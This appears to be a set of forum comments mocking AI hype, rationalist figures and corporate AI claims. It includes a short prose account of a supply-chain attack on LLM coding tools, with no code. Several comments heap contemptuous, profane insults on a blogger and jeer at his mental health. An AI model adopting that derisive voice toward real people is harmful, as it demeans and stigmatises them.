

Getting love bombed in that rationalist con he went to recently probably didn’t help matters.
It’s not always easy to distinguish between existentialism and a bad mood.
Getting love bombed in that rationalist con he went to recently probably didn’t help matters.
The common clay of the new west:
ChatGPT has become worthless
[Business & Professional]
I’m a paid member and asked it to help me research a topic and write a guide and it said it needed days to complete it. That’s a first. Usually it could do this task on the spot.
It missed the first deadline and missed 5 more. 3 weeks went by and it couldn’t get the task done. Went to Claude and it did it in 10 minutes. No idea what is going on with ChatGpt but I cancelled the pay plan.
Anyone else having this kind of issue?
Shamelessly reproduced from the other place:
A quick summary of his last three posts:
“Here’s a thought experiment I came up with to try to justify the murder of tens of thousands of children.”
“Lots of people got mad at me for my last post; have you considered that being mad at me makes me the victim and you a Nazi?”
“I’m actually winning so much right now: it’s very normal that people keep worriedly speculating that I’ve suffered some sort of mental breakdown.”
I’m even grateful, in a way, to SneerClub, and to Woit and his minions. I’m grateful to them for so dramatically confirming that I’m not delusional: some portion of the world really is out to get me. I probably overestimated their power, but not their malevolence. […]
Honestly what he should actually be grateful for is how all his notoriety ever amounted to[1] was a couple of obscure forums going ‘look at this dumb asshole’ and moving on.
He is an insecure and toxic serial overreactor with shit opinions and a huge unpopular-young-nerd chip on his shoulder, and who comes off as being one mildly concerted troll effort away from a psych ward at all times. And probably not even that, judging from Graham Linehan’s life trajectory.
[1] besides Siskind using him to broaden his influence on incels and gamer gaters.
It’s like a one-and-a-half-page article that also comes in audio and video form, don’t be lazy.
They vibe coded a bash injection vulnerability in their devops code, which was used to gain access to the repo and push out a release with malicious code, which prompted any installed LLM wrappers like cursor to gather anything that looked like a configuration or text file in the infected machine and presumably leak them to the attacker.
Modern move money between pockets for profit economics seem to give The Hitchhiker’s Guide bistromathics a run for their money.
I wonder what this means for US GDP
Don’t worry, unchecked inflation and increasing housing costs will keep the GDP propped up at least for a while longer.
He has capital L Lawfulness concerns. About the parent and the child being asymmetrically skilled in context engineering. Which apparently is the main reason kids shouldn’t trust LLM output.
Him showing his ass with the memory comment is just a bonus.
I feel dumber for having read that, and not in the intellectually humbled way.
This hits differently over the recent news that ChatGPT encouraged and aided a teen suicide.
Kelsey Piper xhitted: Never thought I’d become a ‘take you relationship problems to ChatGPT’ person but when the 8yo and I have an argument it actually works really well to mutually agree on an account of events for Claude and the ask for its opinion
I think she considers the AIs far more knowledgeable than me about reasonable human behavior so if I say something that’s no reason to think it’s true but if Claude says it then it at least merits serious consideration
AI innovation in this space usually means automatically adding stuff to the model’s context.
It probably started meaning the (failed) build output got added in every iteration, but it’s entirely possible to feed the LLM debugger data from a runtime crash and hope something usable happens.
When I was at computer toucher school at about the start of the century, under the moniker AI were taught (I think) fuzzy logic, incremental optimization and graph algorithms, and neural networks.
AI is a sci-fi trope far more than it ever was a well-defined research topic.
Anyone who said this about their product would almost certainly by lying, but these guys are extra lying.
For sure, blockchain based agentic LLM that learns as it goes is sounds like someone describing a flying elephant wearing an inflatable life jacket.
Nobody’s using datasets made of copyrighted literature and 4chan to teach robots how to move, what are you even on about.
@dgerard is never going to run out of content for pivot, is he:
“AI is obviously gonna one-shot the human limbic system,” referring to the part of the brain responsible for human emotions. “That said, I predict — counter-intuitively — that it will increase the birth rate!” he continued without explanation. “Mark my words. Also, we’re gonna program it that way.”
Risk checks for financial services: $1M saved annually on outsourced risk management
Since I doubt they had time to use the tools for a full year, this is probably just the month they saved ~85K$ from firing/ending partnership with humans involved in risk assessment multiplied by twelve.
In the long run I’m betting that exclusively using software that not only can’t do basic math but actually treats numbers as words for risk assessment isn’t going to be a net positive for their bottom line, especially if it their customers also get it in their heads that they could ditch the middleman and directly use a chatbot themselves.
This is too corny and overdramatic for my tastes. It reads a bit like satire, complete with piling on the religious undertones there at the end.